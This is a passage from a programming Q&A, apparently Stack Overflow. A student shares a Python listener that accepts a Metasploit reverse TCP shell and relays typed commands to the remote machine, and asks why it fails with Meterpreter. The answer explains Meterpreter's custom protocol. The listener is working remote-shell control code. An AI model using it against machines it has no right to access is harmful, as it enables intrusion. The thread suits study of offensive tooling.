Meterpreter Handler/listener

Question

i'm a cybersecurity students, i'm not a cracker, scriptkiddy or something like this, i'm working on a python meterpreter's listener, i found a normal tcp reverse handler, it is working with cmd reverse tpc (metasploit), but it is no working with meterpreter reverse tpc (metasploit)... Anyone know why? thanks.

#!/usr/bin/python
# import python modules
from socket import *
HOST = ''                 # '' means bind to all interfaces
PORT = 4444                #  port 
# create our socket handler
s = socket(AF_INET, SOCK_STREAM)
# set is so that when we cancel out we can reuse port
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# bind to interface
s.bind((HOST, PORT))
# print we are accepting connections
print "Listening on 0.0.0.0:%s" % str(PORT)
# listen for only 10 connection
s.listen(10)
# accept connections
conn, addr = s.accept()
# print connected by ipaddress
print 'Connected by', addr
# receive initial connection
data = conn.recv(1024)
# start loop
while 1:
     # enter shell command
     command = raw_input("Enter shell command or quit: ")
     # send shell command
     conn.send(command)
     # if we specify quit then break out of loop and close socket
     if command == "quit": break
     # receive output from linux command
     data = conn.recv(1024)
     # print the output of the linux command
     print data
# close socket
conn.close()

Unless you can put the other side's code ... – mementum Jan 16 '16 at 13:26 — mementum, Jan 16 '16 at 13:26
I can't, it is generated by metasploit ! – Syrion Jan 16 '16 at 15:26 — Syrion, Jan 16 '16 at 15:26

score 2 · Answer 1 · answered Jan 17 '16 at 00:40

This won't work with Meterpreter because Meterpreter's transport's support a custom protocol. In order for your "listener" to work with Meterpreter, you will also have to implement this protocol.

It's fairly well documented these days. You can start be reading up on it on the Metasploit Github repo's wiki. For information on the process that Meterpreter goes through to get running, check out this 44con talk (shameless plug), it covers the TLV packets as well. You'll need to support multiple transports, including SSL-wrapped TCP.

Once you've got the TLV stuff working, you'll need to implement all the commands that Meterpreter supports. This doesn't just include the single-shot commands (such as getsystem or ls), you'll have to support stuff like channels.

I won't lie, you're in for a lot of work. Making a functional Meterpreter listener isn't an easy job, and there's quite a bit more to it then you would expect. The fact that there's no Python implementation out there already is a sign.

Best of luck!

Meterpreter Handler/listener

1 Answers1